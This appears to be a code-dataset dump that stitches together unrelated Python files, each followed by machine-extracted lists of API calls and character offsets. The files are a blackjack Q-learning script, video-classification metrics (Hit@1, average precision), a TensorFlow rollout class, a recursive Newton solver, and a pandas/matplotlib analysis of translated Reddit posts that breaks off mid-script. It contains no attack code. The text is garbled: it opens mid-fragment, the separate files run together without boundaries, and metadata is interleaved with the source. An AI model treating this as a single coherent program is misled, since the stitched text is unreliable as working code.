matplotlib.pyplot as plt\n'), ((6190, 6226), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""$C_\\\\ell$"""'], {'fontsize': '(15)'}), "('$C_\\\\ell$', fontsize=15)\n", (6200, 6226), True, 'import matplotlib.pyplot as plt\n'), ((6398, 6422), 'dominate.tags.a', 'dtg.a', (['title'], {'href': 'fname'}), '(title, href=fname)\n', (6403, 6422), True, 'import dominate.tags as dtg\n'), ((7412, 7428), 'numpy.ones_like', 'np.ones_like', (['el'], {}), '(el)\n', (7424, 7428), True, 'import numpy as np\n'), ((5615, 5627), 'numpy.diag', 'np.diag', (['cov'], {}), '(cov)\n', (5622, 5627), True, 'import numpy as np\n'), ((7294, 7305), 'numpy.diag', 'np.diag', (['cv'], {}), '(cv)\n', (7301, 7305), True, 'import numpy as np\n'), ((4577, 4589), 'numpy.diag', 'np.diag', (['cov'], {}), '(cov)\n', (4584, 4589), True, 'import numpy as np\n'), ((5132, 5144), 'numpy.diag', 'np.diag', (['cov'], {}), '(cov)\n', (5139, 5144), True, 'import numpy as np\n')]
|
# Finite Decks, Aces = reactive
# this program just uses the count information to maximize score.
import numpy as np
import matplotlib.pyplot as plt
import random
from rl_tools import (
simulation,
scorecalc,
countcalc,
initializedrawpile,
actionupdate,
acecheck,
cardvalue,
newcard,
twist,
qtableupdate,
)
e = 0.1
nodecks = 6
def learning(e, nodecks):
Qtable = np.zeros(
(34, 2, 5)
) # columns for twitsing and sticking. Extra dimension for divisions of count.
# divisions of count will be c<-10, -10<=c<-3, -3<=c<=3, 3<c<=10, c>10
Instances = np.zeros((34, 2, 5)) # columns for twitsing and sticking.
for n in range(1000):
drawpile = initializedrawpile(nodecks)
while any(drawpile != 0):
Qtable, Instances, drawpile = simulation(Qtable, Instances, drawpile, e)
fig = plt.figure()
ax1 = fig.add_subplot(211)
ax1.plot(range(34), np.sum(Qtable[:, 1, :], axis=1))
ax1.plot(range(34), np.sum(Qtable[:, 0, :], axis=1), color="red")
ax1.legend(["Twist", "Fold"])
ax1.set_ylabel("Average Score")
ax1.set_xlabel("Hand value")
ax1.set(xlim=(-1, 22), ylim=(0, max(np.sum(Qtable[:, 0, :], axis=1)) * 1.1))
plt.xticks(np.arange(0, 22, 1))
plt.show()
testscore = test(Qtable, nodecks)
return Qtable, testscore
# function to test the results of the Qtable on unseen data. No exploration.
def test(Qtable, nodecks):
testscore = np.asarray([])
drawpile = initializedrawpile(nodecks)
while any(drawpile != 0):
# recieve first card
card, drawpile = twist(drawpile)
truecount = countcalc(drawpile)
cardsinhand = np.array([0, card])
newaction = np.argmax(Qtable[sum(cardsinhand), :, truecount])
# while they havent folded or gone bust
while (
newaction == 1
and (sum(cardsinhand) < 22 or 11 in cardsinhand)
and any(drawpile != 0)
):
if sum(cardsinhand) > 21:
# if over 21 replace 11 with 1 for aces.
cardsinhand = acecheck(sum(cardsinhand), cardsinhand)
# now we have changed 11 to 1, find new action.
newaction = actionupdate(Qtable, sum(cardsinhand), e, truecount)
else:
card, drawpile = newcard(newaction, drawpile)
cardsinhand = np.append(cardsinhand, card)
cardsinhand = acecheck(sum(cardsinhand), cardsinhand)
truecount = countcalc(drawpile)
# determine whether to stick or twist
newaction = np.argmax(Qtable[sum(cardsinhand), :, truecount])
score = scorecalc(sum(cardsinhand), len(cardsinhand))
testscore = np.append(testscore, score)
return np.mean(testscore)
|
[
"rl_tools.initializedrawpile",
"matplotlib.pyplot.show",
"numpy.sum",
"rl_tools.twist",
"rl_tools.simulation",
"numpy.asarray",
"numpy.zeros",
"rl_tools.countcalc",
"numpy.append",
"matplotlib.pyplot.figure",
"numpy.mean",
"numpy.arange",
"numpy.array",
"rl_tools.newcard"
] |
[((432, 452), 'numpy.zeros', 'np.zeros', (['(34, 2, 5)'], {}), '((34, 2, 5))\n', (440, 452), True, 'import numpy as np\n'), ((640, 660), 'numpy.zeros', 'np.zeros', (['(34, 2, 5)'], {}), '((34, 2, 5))\n', (648, 660), True, 'import numpy as np\n'), ((906, 918), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (916, 918), True, 'import matplotlib.pyplot as plt\n'), ((1310, 1320), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (1318, 1320), True, 'import matplotlib.pyplot as plt\n'), ((1519, 1533), 'numpy.asarray', 'np.asarray', (['[]'], {}), '([])\n', (1529, 1533), True, 'import numpy as np\n'), ((1550, 1577), 'rl_tools.initializedrawpile', 'initializedrawpile', (['nodecks'], {}), '(nodecks)\n', (1568, 1577), False, 'from rl_tools import simulation, scorecalc, countcalc, initializedrawpile, actionupdate, acecheck, cardvalue, newcard, twist, qtableupdate\n'), ((2875, 2893), 'numpy.mean', 'np.mean', (['testscore'], {}), '(testscore)\n', (2882, 2893), True, 'import numpy as np\n'), ((746, 773), 'rl_tools.initializedrawpile', 'initializedrawpile', (['nodecks'], {}), '(nodecks)\n', (764, 773), False, 'from rl_tools import simulation, scorecalc, countcalc, initializedrawpile, actionupdate, acecheck, cardvalue, newcard, twist, qtableupdate\n'), ((976, 1007), 'numpy.sum', 'np.sum', (['Qtable[:, 1, :]'], {'axis': '(1)'}), '(Qtable[:, 1, :], axis=1)\n', (982, 1007), True, 'import numpy as np\n'), ((1034, 1065), 'numpy.sum', 'np.sum', (['Qtable[:, 0, :]'], {'axis': '(1)'}), '(Qtable[:, 0, :], axis=1)\n', (1040, 1065), True, 'import numpy as np\n'), ((1284, 1303), 'numpy.arange', 'np.arange', (['(0)', '(22)', '(1)'], {}), '(0, 22, 1)\n', (1293, 1303), True, 'import numpy as np\n'), ((1665, 1680), 'rl_tools.twist', 'twist', (['drawpile'], {}), '(drawpile)\n', (1670, 1680), False, 'from rl_tools import simulation, scorecalc, countcalc, initializedrawpile, actionupdate, acecheck, cardvalue, newcard, twist, qtableupdate\n'), ((1702, 1721), 'rl_tools.countcalc', 'countcalc', (['drawpile'], {}), '(drawpile)\n', (1711, 1721), False, 'from rl_tools import simulation, scorecalc, countcalc, initializedrawpile, actionupdate, acecheck, cardvalue, newcard, twist, qtableupdate\n'), ((1745, 1764), 'numpy.array', 'np.array', (['[0, card]'], {}), '([0, card])\n', (1753, 1764), True, 'import numpy as np\n'), ((2835, 2862), 'numpy.append', 'np.append', (['testscore', 'score'], {}), '(testscore, score)\n', (2844, 2862), True, 'import numpy as np\n'), ((852, 894), 'rl_tools.simulation', 'simulation', (['Qtable', 'Instances', 'drawpile', 'e'], {}), '(Qtable, Instances, drawpile, e)\n', (862, 894), False, 'from rl_tools import simulation, scorecalc, countcalc, initializedrawpile, actionupdate, acecheck, cardvalue, newcard, twist, qtableupdate\n'), ((2408, 2436), 'rl_tools.newcard', 'newcard', (['newaction', 'drawpile'], {}), '(newaction, drawpile)\n', (2415, 2436), False, 'from rl_tools import simulation, scorecalc, countcalc, initializedrawpile, actionupdate, acecheck, cardvalue, newcard, twist, qtableupdate\n'), ((2468, 2496), 'numpy.append', 'np.append', (['cardsinhand', 'card'], {}), '(cardsinhand, card)\n', (2477, 2496), True, 'import numpy as np\n'), ((2597, 2616), 'rl_tools.countcalc', 'countcalc', (['drawpile'], {}), '(drawpile)\n', (2606, 2616), False, 'from rl_tools import simulation, scorecalc, countcalc, initializedrawpile, actionupdate, acecheck, cardvalue, newcard, twist, qtableupdate\n'), ((1227, 1258), 'numpy.sum', 'np.sum', (['Qtable[:, 0, :]'], {'axis': '(1)'}), '(Qtable[:, 0, :], axis=1)\n', (1233, 1258), True, 'import numpy as np\n')]
|
# Copyright (c) 2021 Qualcomm Technologies, Inc.
# All Rights Reserved.
import numpy as np
from ignite.metrics import Metric
def softmax(logit):
e_x = np.exp(logit - np.max(logit))
return e_x / e_x.sum()
def sigmoid(logit):
return 1 / (1 + np.exp(-logit))
class Hitat1(Metric):
"""
Performs a local (numpy) calculation of the hit at one.
"""
def __init__(
self, aggregation="max", output_transform=lambda x: x, activation_fn=None
):
self.predictions_dict = {}
self.actuals_dict = {}
self.aggregation = np.max if aggregation == "max" else np.mean
self.apply_activation = (
softmax
if activation_fn == "softmax"
else sigmoid
if activation_fn == "sigmoid"
else None
)
super(Hitat1, self).__init__(output_transform=output_transform, device=None)
def reset(self):
self.predictions_dict = {}
self.actuals_dict = {}
def update(self, output, masks=None):
"""
Parameters
----------
# predictions is n * num_class numpy array of predictions where n is number of samples
# actuals is n * num_class numpy array of multihot labels where n is number of samples
"""
predictions, actuals, ids = output
for i, key in enumerate(ids):
if key in self.predictions_dict:
self.predictions_dict[key].append(predictions[i])
self.actuals_dict[key].append(actuals[i])
else:
self.predictions_dict[key] = [predictions[i]]
self.actuals_dict[key] = [actuals[i]]
def compute(self):
preds, acts, keys = [], [], []
for key in self.predictions_dict.keys():
pred_video = self.aggregation(
np.stack(self.predictions_dict[key]), axis=0
).squeeze()
if self.apply_activation:
pred_video = self.apply_activation(pred_video)
preds.append(pred_video)
acts.append(np.stack(self.actuals_dict[key]).max(axis=0).squeeze())
keys.append(key)
preds = np.stack(preds)
acts = np.stack(acts)
non_negative = np.any(acts, axis=1)
acts = acts[non_negative]
preds = preds[non_negative]
top_prediction = np.argmax(preds, 1)
hits = acts[np.arange(acts.shape[0]), top_prediction]
return np.average(hits)
class AveragePrecision(Metric):
# compute metrics based on video ids
def __init__(
self,
num_class=1000,
top_n=None,
aggregation="max",
filter_empty_classes=False,
output_transform=lambda x: x,
activation_fn=None,
):
super(AveragePrecision, self).__init__(
output_transform=output_transform, device=None
)
self.num_class = num_class
self.top_n = top_n
self.filter_empty_classes = filter_empty_classes
self.predictions = [[] for _ in range(num_class)]
self.actuals = [[] for _ in range(num_class)]
self.predictions_dict = {}
self.actuals_dict = {}
self.aggregation = np.max if aggregation == "max" else np.mean
self.apply_activation = (
softmax
if activation_fn == "softmax"
else sigmoid
if activation_fn == "sigmoid"
else None
)
def reset(self):
self.predictions_dict = {}
self.actuals_dict = {}
def update(self, output):
"""
Parameters
----------
# predictions is n * num_class numpy array of predictions where n is number of samples
# actuals is n * num_class numpy array of multihot labels where n is number of samples
"""
predictions, actuals, ids = output
for i, key in enumerate(ids):
if key in self.predictions_dict:
self.predictions_dict[key].append(predictions[i])
self.actuals_dict[key].append(actuals[i])
else:
self.predictions_dict[key] = [predictions[i]]
self.actuals_dict[key] = [actuals[i]]
def compute(self):
predictions, actuals, keys = self._arrange_predictions_by_class()
res = []
for i in range(self.num_class):
target = np.concatenate(actuals[i])
output = np.concatenate(predictions[i])
ap_class, num_pos = self.ap(output, target, top_n=self.top_n)
if not self.filter_empty_classes or num_pos > 0:
res.append(ap_class)
return res
def _arrange_predictions_by_class(self):
preds, acts, keys = [], [], []
for key in self.predictions_dict.keys():
pred_video = self.aggregation(
np.stack(self.predictions_dict[key]), axis=0
).squeeze()
if self.apply_activation:
pred_video = self.apply_activation(pred_video)
preds.append(pred_video)
acts.append(np.stack(self.actuals_dict[key]).max(axis=0).squeeze())
keys.append(key)
preds = np.stack(preds)
acts = np.stack(acts)
predictions = [[] for _ in range(self.num_class)]
actuals = [[] for _ in range(self.num_class)]
for i in range(self.num_class):
predictions[i].append(preds[:, i])
actuals[i].append(acts[:, i])
return predictions, actuals, keys
@staticmethod
def ap(predictions, actuals, top_n=None):
num_positive_total = actuals.sum()
if num_positive_total == 0:
return float("NaN"), 0
sorted_idx = np.argsort(predictions)[::-1]
if top_n is not None:
sorted_idx = sorted_idx[:top_n]
actuals = actuals[sorted_idx]
num_pos = actuals.sum()
precisions = np.cumsum(actuals) / np.arange(1, len(actuals) + 1)
ap = (precisions * actuals).sum() / (float(num_pos) + 1e-15)
return ap, num_positive_total
|
[
"numpy.stack",
"numpy.average",
"numpy.argmax",
"numpy.any",
"numpy.argsort",
"numpy.max",
"numpy.cumsum",
"numpy.arange",
"numpy.exp",
"numpy.concatenate"
] |
[((2169, 2184), 'numpy.stack', 'np.stack', (['preds'], {}), '(preds)\n', (2177, 2184), True, 'import numpy as np\n'), ((2200, 2214), 'numpy.stack', 'np.stack', (['acts'], {}), '(acts)\n', (2208, 2214), True, 'import numpy as np\n'), ((2239, 2259), 'numpy.any', 'np.any', (['acts'], {'axis': '(1)'}), '(acts, axis=1)\n', (2245, 2259), True, 'import numpy as np\n'), ((2356, 2375), 'numpy.argmax', 'np.argmax', (['preds', '(1)'], {}), '(preds, 1)\n', (2365, 2375), True, 'import numpy as np\n'), ((2453, 2469), 'numpy.average', 'np.average', (['hits'], {}), '(hits)\n', (2463, 2469), True, 'import numpy as np\n'), ((5166, 5181), 'numpy.stack', 'np.stack', (['preds'], {}), '(preds)\n', (5174, 5181), True, 'import numpy as np\n'), ((5197, 5211), 'numpy.stack', 'np.stack', (['acts'], {}), '(acts)\n', (5205, 5211), True, 'import numpy as np\n'), ((173, 186), 'numpy.max', 'np.max', (['logit'], {}), '(logit)\n', (179, 186), True, 'import numpy as np\n'), ((257, 271), 'numpy.exp', 'np.exp', (['(-logit)'], {}), '(-logit)\n', (263, 271), True, 'import numpy as np\n'), ((4370, 4396), 'numpy.concatenate', 'np.concatenate', (['actuals[i]'], {}), '(actuals[i])\n', (4384, 4396), True, 'import numpy as np\n'), ((4418, 4448), 'numpy.concatenate', 'np.concatenate', (['predictions[i]'], {}), '(predictions[i])\n', (4432, 4448), True, 'import numpy as np\n'), ((5697, 5720), 'numpy.argsort', 'np.argsort', (['predictions'], {}), '(predictions)\n', (5707, 5720), True, 'import numpy as np\n'), ((5893, 5911), 'numpy.cumsum', 'np.cumsum', (['actuals'], {}), '(actuals)\n', (5902, 5911), True, 'import numpy as np\n'), ((2396, 2420), 'numpy.arange', 'np.arange', (['acts.shape[0]'], {}), '(acts.shape[0])\n', (2405, 2420), True, 'import numpy as np\n'), ((1837, 1873), 'numpy.stack', 'np.stack', (['self.predictions_dict[key]'], {}), '(self.predictions_dict[key])\n', (1845, 1873), True, 'import numpy as np\n'), ((4834, 4870), 'numpy.stack', 'np.stack', (['self.predictions_dict[key]'], {}), '(self.predictions_dict[key])\n', (4842, 4870), True, 'import numpy as np\n'), ((2068, 2100), 'numpy.stack', 'np.stack', (['self.actuals_dict[key]'], {}), '(self.actuals_dict[key])\n', (2076, 2100), True, 'import numpy as np\n'), ((5065, 5097), 'numpy.stack', 'np.stack', (['self.actuals_dict[key]'], {}), '(self.actuals_dict[key])\n', (5073, 5097), True, 'import numpy as np\n')]
|
import numpy as np
import tensorflow as tf
class BatchRollout:
def __init__(self, env, max_episode_steps):
self.env = env
self.max_episode_steps = max_episode_steps
def __call__(self, policy, episodes, render=False):
assert len(self.env) == episodes
observation_space = self.env.observation_space
action_space = self.env.action_space
observations = np.zeros(
shape=(episodes, self.max_episode_steps) + observation_space.shape,
dtype=observation_space.dtype,
)
actions = np.zeros(
shape=(episodes, self.max_episode_steps) + action_space.shape,
dtype=action_space.dtype,
)
rewards = np.zeros(shape=(episodes, self.max_episode_steps), dtype=np.float32)
weights = np.zeros(shape=(episodes, self.max_episode_steps), dtype=np.float32)
batch_size = len(self.env)
episode_done = np.zeros(shape=batch_size, dtype=np.bool)
observation = self.env.reset()
for step in range(self.max_episode_steps):
if render:
self.env.envs[0].render()
observation_tensor = tf.convert_to_tensor(observation, dtype=tf.float32)
action_tensor = policy(observation_tensor[:, None, ...], training=False)
action = action_tensor[:, 0].numpy()
observation_next, reward, done, info = self.env.step(action)
observations[:, step] = observation
actions[:, step] = action
rewards[:, step] = reward
weights[:, step] = np.where(episode_done, 0.0, 1.0)
# update episode done status
episode_done = episode_done | done
# end the rollout if all episodes are done
if np.all(episode_done):
break
observation = observation_next
# ensure rewards are masked
rewards *= weights
observations = tf.convert_to_tensor(observations)
actions = tf.convert_to_tensor(actions)
rewards = tf.convert_to_tensor(rewards)
weights = tf.convert_to_tensor(weights)
return observations, actions, rewards, weights
|
[
"tensorflow.convert_to_tensor",
"numpy.where",
"numpy.zeros",
"numpy.all"
] |
[((410, 521), 'numpy.zeros', 'np.zeros', ([], {'shape': '((episodes, self.max_episode_steps) + observation_space.shape)', 'dtype': 'observation_space.dtype'}), '(shape=(episodes, self.max_episode_steps) + observation_space.shape,\n dtype=observation_space.dtype)\n', (418, 521), True, 'import numpy as np\n'), ((571, 672), 'numpy.zeros', 'np.zeros', ([], {'shape': '((episodes, self.max_episode_steps) + action_space.shape)', 'dtype': 'action_space.dtype'}), '(shape=(episodes, self.max_episode_steps) + action_space.shape,\n dtype=action_space.dtype)\n', (579, 672), True, 'import numpy as np\n'), ((722, 790), 'numpy.zeros', 'np.zeros', ([], {'shape': '(episodes, self.max_episode_steps)', 'dtype': 'np.float32'}), '(shape=(episodes, self.max_episode_steps), dtype=np.float32)\n', (730, 790), True, 'import numpy as np\n'), ((809, 877), 'numpy.zeros', 'np.zeros', ([], {'shape': '(episodes, self.max_episode_steps)', 'dtype': 'np.float32'}), '(shape=(episodes, self.max_episode_steps), dtype=np.float32)\n', (817, 877), True, 'import numpy as np\n'), ((937, 978), 'numpy.zeros', 'np.zeros', ([], {'shape': 'batch_size', 'dtype': 'np.bool'}), '(shape=batch_size, dtype=np.bool)\n', (945, 978), True, 'import numpy as np\n'), ((1955, 1989), 'tensorflow.convert_to_tensor', 'tf.convert_to_tensor', (['observations'], {}), '(observations)\n', (1975, 1989), True, 'import tensorflow as tf\n'), ((2008, 2037), 'tensorflow.convert_to_tensor', 'tf.convert_to_tensor', (['actions'], {}), '(actions)\n', (2028, 2037), True, 'import tensorflow as tf\n'), ((2056, 2085), 'tensorflow.convert_to_tensor', 'tf.convert_to_tensor', (['rewards'], {}), '(rewards)\n', (2076, 2085), True, 'import tensorflow as tf\n'), ((2104, 2133), 'tensorflow.convert_to_tensor', 'tf.convert_to_tensor', (['weights'], {}), '(weights)\n', (2124, 2133), True, 'import tensorflow as tf\n'), ((1170, 1221), 'tensorflow.convert_to_tensor', 'tf.convert_to_tensor', (['observation'], {'dtype': 'tf.float32'}), '(observation, dtype=tf.float32)\n', (1190, 1221), True, 'import tensorflow as tf\n'), ((1586, 1618), 'numpy.where', 'np.where', (['episode_done', '(0.0)', '(1.0)'], {}), '(episode_done, 0.0, 1.0)\n', (1594, 1618), True, 'import numpy as np\n'), ((1779, 1799), 'numpy.all', 'np.all', (['episode_done'], {}), '(episode_done)\n', (1785, 1799), True, 'import numpy as np\n')]
|
from typing import Callable
import numpy as np
def newtonSolver(f: Callable, f_prime: Callable, guess: float,
tol: float=10e-6, prev: float=0) -> float:
"""Newton method solver for 1 dimension, implemented recursively.
Arguments:
f {Callable} -- Objective function (must have zero root).
f_prime {Callable} -- First derivative of objective with respect to
the decision variable.
guess {float} -- Guess for the decision variable.
Keyword Arguments:
tol {float} -- Tolerance level (default: {10e-6}).
prev {float} -- Guess from previous iteration (for convergence check).
Returns:
float -- Solution to the function s.t. f(x) = 0.
"""
# Assigning current guess to x_old
x_old = guess
# Checking if decision variable changed by less than tolerance level
if np.abs(x_old - prev) < tol:
return x_old
else:
# Compute new estimate for x
x_new = x_old - (f(x_old) / f_prime(x_old))
return newtonSolver(f=f, f_prime=f_prime, guess=x_new,
tol=tol, prev=x_old)
|
[
"numpy.abs"
] |
[((903, 923), 'numpy.abs', 'np.abs', (['(x_old - prev)'], {}), '(x_old - prev)\n', (909, 923), True, 'import numpy as np\n')]
|
# -*- coding: utf-8 -*-
#%%
######################################################
# libraries
import pandas as pd
import matplotlib as mpl
import matplotlib.pyplot as plt
import numpy as np
from mpl_toolkits.axes_grid1 import AxesGrid
import math
from scipy import stats
# matplotlib params
mpl.rcParams["axes.titlesize"] = 24
mpl.rcParams["axes.grid"] = True
mpl.rcParams["axes.labelsize"] = 16
mpl.rcParams["xtick.labelsize"] = 14
mpl.rcParams["ytick.labelsize"] = 14
#%%
######################################################
# import data
infile = "20170101T000000-20190101T000000.csv"
df = pd.read_csv(infile, encoding="utf-8", index_col=None, header=0, lineterminator="\n")
totalUnfiltered = df.shape[0]
print("Số bài viết tổng cộng: {:d}".format(totalUnfiltered))
######################################################
# define columns types and filter
df["r"] = df["r"].astype("category")
df["user_raw_id"] = df["user_raw_id"].astype(np.int64)
df["post_raw_id"] = df["post_raw_id"].astype(np.int64)
# avoid case sensitive
df["r"] = df["r"].str.lower()
# time conversion
df.drop(df[df["r_created_utc"] == 0].index, inplace=True) # filter
df["created_time"]=pd.to_datetime(df["created_time"], format="%Y-%m-%dT%H:%M:%S.000Z", utc=True).dt.tz_convert("Asia/Ho_Chi_Minh")
df["r_created_utc"]=pd.to_datetime(df["r_created_utc"], unit="s", utc=True).dt.tz_convert("Asia/Ho_Chi_Minh")
df.drop(df[df["created_time"].dt.year == 2019].index, inplace=True) # filter
totalFiltered = df.shape[0]
print("Số bài viết sau khi lọc: {:d}. Tương đương {:.2f}% tổng số bài.".format(totalFiltered, totalFiltered / totalUnfiltered * 100))
######################################################
# determine week day of post
vietnameseDaysOfWeek = ['Hai', 'Ba', 'Tư', 'Năm', 'Sáu', 'Bảy', 'CN']
df["weekday"] = df["created_time"].dt.weekday
df["weekday"] = df["weekday"].astype("category")
r = pd.crosstab(index=df["r"], columns="count")
r.sort_values(by="count", ascending=False, inplace=True)
######################################################
# interests mesure
interests = df.groupby("r")["likes_count", "comments_count"].sum()
interests["sum"] = interests["likes_count"] + interests["comments_count"]
interests.sort_values(by="sum", ascending=False, inplace=True)
######################################################
# prepare hour stats
numWeeks = math.ceil((df.iloc[-1]["created_time"] - df.iloc[0]["created_time"]).days/7)
def meanPostsPerWeek(series):
return np.size(series) / numWeeks
dfWeekdayHourPerSub = df.pivot_table(index=["r", df["created_time"].dt.hour], columns="weekday", values=["likes_count", "post_id"], aggfunc={"likes_count": np.mean, "post_id": meanPostsPerWeek}, fill_value=0)
######################################################
# translators stats
translators = df[["user_raw_id", "user_name"]].copy()
translators.drop_duplicates(subset="user_raw_id", keep='first', inplace=True)
translators.set_index("user_raw_id", inplace=True)
translatorsStats = df.pivot_table(index="user_raw_id", values=["likes_count", "post_id"], aggfunc={"likes_count": [np.sum, np.mean], "post_id": [np.size, meanPostsPerWeek]}, fill_value=0)
#%%
######################################################
# retrospect memory usage
df.info(memory_usage='deep')
for dtype in list(set(df.dtypes)):
selected_dtype = df.select_dtypes(include=[dtype])
sumUsageB = selected_dtype.memory_usage(deep=True).sum()
sumUsageMB = sumUsageB / 1024 ** 2
print("Sum memory usage for {} columns: {:03.2f} MB".format(dtype,sumUsageMB))
print("Usage of each column in MB")
for colName, usageB in df.memory_usage(index=True, deep=True).items():
print("{:<20} {:10.2f} MB".format(colName, usageB / 1024 ** 2))
del dtype, selected_dtype, sumUsageB, sumUsageMB, colName, usageB
#%%
######################################################
# posts by month
df["created_time_utc"] = df["created_time"].dt.tz_convert('UTC')
grouperAllByMonth = df.groupby(by=pd.Grouper(freq="M", key="created_time_utc"))
allPostsByMonth = grouperAllByMonth["post_id"].size().fillna(0)
allLikesByMonth = grouperAllByMonth["likes_count"].sum().fillna(0)
fig = plt.figure()
plt.title("Thống kê tổng số post và like")
monthLabels = allPostsByMonth.index.strftime("%m-%Y").tolist()
ax1 = fig.add_subplot(111)
ax1.plot(monthLabels, allPostsByMonth, "r-", label="Post")
ax1.set_xlabel("Tháng")
ax1.set_ylabel("Số bài viết")
ax2 = ax1.twinx()
ax2.plot(monthLabels, allLikesByMonth, "b-", label="Like")
ax2.set_ylabel("Số like")
ax2.grid(False)
fig.autofmt_xdate()
handles, labels = [],[]
for ax in fig.axes:
for h, l in zip(*ax.get_legend_handles_labels()):
handles.append(h)
labels.append(l)
plt.legend(handles, labels, loc="upper left")
plt.show()
del grouperAllByMonth, allPostsByMonth, allLikesByMonth, handles, labels, h, l, fig, ax1, ax2
df.drop("created_time_utc", axis=1, inplace=True)
#%%
######################################################
# hot subreddits
subs = r.index.nunique()
print("Số subreddit được dịch: {:d}".format(subs))
print("Số bài dịch mỗi sub trung bình: {:f}".format(float(r.mean())))
subsGreater1 = (r > 1).sum()[0]
print("Số subreddit có trên 1 bài viết: {:d}. Tương đương {:.2f}% tổng số sub.".format(subsGreater1, subsGreater1 / subs * 100))
subsGreater10 = (r > 10).sum()[0]
print("Số subreddit có trên 10 bài viết: {:d}. Tương đương {:.2f}% tổng số sub.".format(subsGreater10, subsGreater10 / subs * 100))
subsGreater100 = (r > 100).sum()[0]
print("Số subreddit có trên 100 bài viết: {:d}. Tương đương {:.2f}% tổng số sub.".format(subsGreater100, subsGreater100 / subs * 100))
del subs, subsGreater1, subsGreater10, subsGreater100
#%%
######################################################
# top translated subreddits
N = 30
rTop = r.head(N)
y = np.arange(N)
fig, ax = plt.subplots()
plt.barh(y, rTop["count"])
plt.title("Những Subreddit nhiều bài dịch nhất")
plt.xlabel("Số bài được dịch")
plt.yticks(y, rTop.index.tolist())
for i in ax.patches:
ax.text(i.get_width() + .1, i.get_y() + 0.5, str(int(i.get_width())), color="black", fontsize=14)
ax.invert_yaxis()
ax.grid(False)
plt.show()
del N, rTop, y, i, fig, ax
#%%
######################################################
# top interested subreddits
Ni = 30
yi = np.arange(Ni)
ax = interests.iloc[0:Ni][["likes_count","comments_count"]].plot.barh(stacked=True)
plt.title("Những Subreddit được chú ý nhất")
plt.xlabel("Tổng số cảm xúc và bình luận")
plt.yticks(yi, r.head(Ni).index.tolist())
plt.ylabel("")
for i, subreddit in enumerate(interests[0:Ni].index.tolist()):
s = interests.loc[subreddit]["sum"]
ax.annotate(str(s), (s, i + .1), color="black", fontsize=14)
ax.invert_yaxis()
ax.grid(False)
del Ni, yi, ax, i, subreddit, s
#%%
######################################################
# askreddit's comments
ratioCommentsCount = interests["comments_count"][0] / interests["comments_count"]
ratioCommentsCount = ratioCommentsCount.drop("askreddit")
ratioCommentsCount = ratioCommentsCount.replace(np.inf, np.nan).dropna()
print("askreddit có số comment nhiều hơn các sub khác {:.2f} lần trở lên.".format(float(ratioCommentsCount.min())))
del ratioCommentsCount
#%%
######################################################
# mean interests
meanInterests = df.groupby("r")["likes_count", "comments_count"].mean()
N = 30
for i in range(N):
subreddit = interests.index[i]
print("Trung bình một bài {:s} sẽ có {:.0f} like (cảm xúc) và {:.0f} bình luận.".format(subreddit, meanInterests.loc[subreddit]["likes_count"], meanInterests.loc[subreddit]["comments_count"]))
# print("{} & {:.0f} & {:.0f} \\\\\n\\hline".format(subreddit, meanInterests.loc[subreddit]["likes_count"], meanInterests.loc[subreddit]["comments_count"]))
print("Còn trung bình toàn thể là {:.0f} like (cảm xúc) và {:.0f} bình luận.".format(df["likes_count"].mean(), df["comments_count"].mean()))
del meanInterests, N, i, subreddit
#%%
######################################################
# posts per month overall
grouperByRMonth = df.groupby(["r", pd.Grouper(freq="M", key="created_time")])
countRByMonth = grouperByRMonth["post_id"].count().unstack("r").fillna(0)
Nr = 15
fig, ax = plt.subplots()
plt.set_cmap("nipy_spectral")
monthLabels = countRByMonth.index.strftime("%m-%Y").tolist()
for subreddit in r.index[0:Nr-1].tolist():
ax.plot(monthLabels, countRByMonth[subreddit].tolist(), label=subreddit)
plt.title("Số bài dịch mỗi sub theo thời gian")
plt.ylabel("")
plt.xlabel("")
fig.autofmt_xdate()
ax.legend()
plt.show()
del grouperByRMonth, countRByMonth, Nr, fig, ax, monthLabels, subreddit
#%%
######################################################
# mean likes per hour overall
dfMeanLikesWeekdayHour = df.pivot_table(index=df["created_time"].dt.hour, columns="weekday", values="likes_count", aggfunc="mean")
fig, ax = plt.subplots()
im = ax.imshow(dfMeanLikesWeekdayHour, cmap="Reds", aspect="auto")
ax.set_xticks(np.arange(len(vietnameseDaysOfWeek)))
ax.set_xticklabels(vietnameseDaysOfWeek)
ax.grid(False)
plt.title("Like trung bình theo giờ đăng")
plt.ylabel("Giờ")
plt.xlabel("Thứ")
plt.colorbar(im, ax=ax)
plt.show()
del dfMeanLikesWeekdayHour, fig, ax, im
#%%
######################################################
# mean posts per hour overall
dfMeanPostsWeekdayHour = df.pivot_table(index=df["created_time"].dt.hour, columns="weekday", values="post_id", aggfunc=np.size)/numWeeks
fig, ax = plt.subplots()
im = ax.imshow(dfMeanPostsWeekdayHour, cmap="Reds", aspect="auto")
ax.set_xticks(np.arange(len(vietnameseDaysOfWeek)))
ax.set_xticklabels(vietnameseDaysOfWeek)
ax.grid(False)
plt.title("Số bài trung bình theo giờ đăng")
plt.ylabel("Giờ")
plt.xlabel("Thứ")
plt.colorbar(im, ax=ax)
plt.show()
del dfMeanPostsWeekdayHour, fig, ax, im
#%%
######################################################
# mean likes per hour per sub
Nrow = 2
Ncol = 4
Noffset = 0
listTopSubs = r.index[Noffset:(Noffset+Nrow*Ncol)].tolist()
fig = plt.figure()
grid = AxesGrid(fig, 111, nrows_ncols=(Nrow, Ncol), axes_pad=0.5, share_all=True, label_mode="L", cbar_location="right", cbar_mode="single", cbar_pad=0.1, aspect=False)
for i in range(Nrow*Ncol):
subreddit = listTopSubs[i]
imTemp = grid[i].imshow(dfWeekdayHourPerSub.query('r == "{:s}"'.format(subreddit))["likes_count"], cmap="Reds", aspect="auto")
grid[i].set_title(subreddit, fontsize=20)
grid[i].set_aspect("auto")
grid[i].set_xlabel("Thứ")
grid[i].set_ylabel("Giờ")
grid[i].tick_params(axis="both", labelsize=12)
grid[i].grid(False)
grid.cbar_axes[0].colorbar(imTemp)
grid.axes_llc.set_xticks(np.arange(len(vietnameseDaysOfWeek)))
grid.axes_llc.set_xticklabels(vietnameseDaysOfWeek)
fig.suptitle("Like trung bình mỗi giờ của {:d} sub nổi nhất".format(Nrow*Ncol), fontsize=24)
plt.show()
del Nrow, Ncol, Noffset, listTopSubs, fig, grid, i, subreddit, imTemp
#%%
######################################################
# mean posts per hour per sub
Nrow = 2
Ncol = 4
Noffset = 0
listTopSubs = r.index[Noffset:(Noffset+Nrow*Ncol)].tolist()
fig = plt.figure()
